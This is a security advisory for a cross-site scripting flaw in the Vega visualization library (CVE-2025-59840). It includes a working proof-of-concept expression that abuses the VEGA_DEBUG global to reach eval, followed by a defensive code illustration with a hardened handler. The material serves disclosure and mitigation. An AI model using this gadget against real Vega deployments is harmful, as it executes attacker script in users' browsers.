CVE-2025-59840: Vega Cross-Site Scripting (XSS) via expressions abusing toString calls in environments using the VEGA_DEBUG global variable
Vega evaluates expressions in a secure context in which arbitrary function calls are prohibited. When an event is exposed to an expression, however, the expression can read members of window objects. Because of this exposure, in some applications a crafted object that overrides its toString method with a borrowed function whose body ends up calling this.foo(this.bar) can achieve DOM XSS.
In practice, an accessible gadget of this kind exists in the global VEGA_DEBUG code, as in the following expression.
({
toString: event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on,
eventName: event.view.console.log,
_handlers: {
undefined: 'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'
},
_handlerIndex: event.view.eval
})+1
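The mechanism behind that expression, and one way to close it, as an added example that is not Vega's code: `VulnerableHandler` is a simplified stand-in for the shape of `CanvasHandler.prototype.on` implied by the gadget (a method that dispatches through properties of `this` without checking what `this` is), `HardenedHandler` is an assumed hardening using private class fields, and a recording sink replaces `eval` so the payload string is only captured, never executed. `debugGlobalExposed` is a small deployment check for embedders.

```javascript
// Added illustration, not Vega's code. VulnerableHandler is a simplified
// stand-in for the shape of CanvasHandler.prototype.on; HardenedHandler is an
// assumed mitigation; the sink passed to buildGadget stands in for eval.

// Stand-in: `on` reads eventName, _handlers and _handlerIndex off `this`, so
// whoever controls `this` controls which function is called with what.
class VulnerableHandler {
  constructor() {
    this._handlers = {};
    this._handlerIndex = (list, type, handler) => (list ? list.indexOf(handler) : -1);
  }
  eventName(type) { return type; }
  on(type, handler) {
    const name = this.eventName(type);
    const h = this._handlers;
    const i = this._handlerIndex(h[name], type, handler);
    if (i < 0) { (h[name] = h[name] || []).push(handler); return h[name].length - 1; }
    return i;
  }
}

// Assumed hardening: private fields throw a TypeError when `this` is not a
// genuine instance, so a borrowed `on` cannot be driven by an attacker-built
// object literal, and no dispatch target is ever read from `this`.
class HardenedHandler {
  #handlers = {};
  #handlerIndex(list, handler) { return list ? list.indexOf(handler) : -1; }
  eventName(type) { return type; }
  on(type, handler) {
    const h = this.#handlers;               // rejects a foreign receiver first
    if (typeof handler !== 'function') throw new TypeError('handler must be a function');
    const name = this.eventName(type);
    const i = this.#handlerIndex(h[name], handler);
    if (i < 0) { (h[name] = h[name] || []).push(handler); return h[name].length - 1; }
    return i;
  }
}

// Mirrors the advisory's object literal: toString borrowed from the prototype,
// eventName standing in for console.log (returns undefined), a handler table
// keyed by "undefined", and `sink` where eval sat. Constructed for the demo.
function buildGadget(HandlerClass, sink, payload) {
  return {
    toString: HandlerClass.prototype.on,
    eventName: () => undefined,
    _handlers: { undefined: payload },
    _handlerIndex: sink,
  };
}

// Forces string coercion (the `+1` in the PoC) and reports whether the sink
// was reached. With the vulnerable handler the sink receives the payload;
// with the hardened one the private-field access throws before any dispatch.
function coerceAndObserve(HandlerClass) {
  const reached = [];
  const gadget = buildGadget(HandlerClass, code => { reached.push(code); return code; }, 'PAYLOAD');
  try {
    const value = gadget + 1;
    return { value, reached, blocked: false };
  } catch (e) {
    return { value: null, reached, blocked: e instanceof TypeError };
  }
}

// Deployment check for embedders: the gadget needs the VEGA_DEBUG global, so
// production pages that do not define it remove this particular path.
function debugGlobalExposed(globalObj) {
  return 'VEGA_DEBUG' in Object(globalObj);
}

console.log(coerceAndObserve(VulnerableHandler)); // sink reached, value 'PAYLOAD1'
console.log(coerceAndObserve(HardenedHandler));   // blocked: true, sink never reached
```

The point of the hardened variant is not the specific class syntax but the property it restores: a method that can be borrowed and invoked on an arbitrary receiver must fail closed rather than trust that receiver's own fields.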
References
- github.com/advisories/GHSA-7f2v-3qq3-vvjf
- github.com/vega/editor/blob/e102355589d23cdd0dbfd607a2cc5f9c5b7a4c55/src/components/renderer/renderer.tsx
- github.com/vega/editor/blob/e102355589d23cdd0dbfd607a2cc5f9c5b7a4c55/src/index.tsx
- github.com/vega/vega
- github.com/vega/vega/security/advisories/GHSA-7f2v-3qq3-vvjf
- nvd.nist.gov/vuln/detail/CVE-2025-59840
- vega.github.io/editor/
- vega.github.io/vega/usage/interpreter